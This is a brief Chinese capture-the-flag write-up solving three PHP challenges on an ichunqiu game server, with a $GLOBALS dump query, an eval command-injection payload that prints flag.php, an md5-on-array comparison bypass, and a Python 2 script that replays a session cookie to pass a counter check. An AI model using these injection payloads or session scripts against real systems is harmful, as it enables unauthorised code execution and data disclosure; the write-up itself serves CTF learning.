爆破-1
全局变量$GLOBALS
?hello=GLOBALS
爆破-2
命令注入
?hello=);show_source('flag.php');//
eval( "var_dump($a);");
eval( "var_dump();show_source('flag.php');//);");
爆破-3
目标
$_SESSION['nums']>=10
条件
if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
$_SESSION['nums']++;
md5()如果参数是数组则返回0
第一次请求参数为value[]=e&value[]=a
#coding=utf-8
import requests
url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]=e&value[]=a'
r=requests.get(url)
cookies={'PHPSESSID':r.headers['Set-Cookie'][10:36]}#获得会话id
for i in xrange(11):
url='http://82991386f7a64ea09ecc9545b8ac8bc0c42e0a4155474630.game.ichunqiu.com?value[]={0}&value[]={1}'.format(r.content[0:1],r.content[1:2])
print url
r=requests.get(url,cookies=cookies)
if i==10:
print r.content
网友评论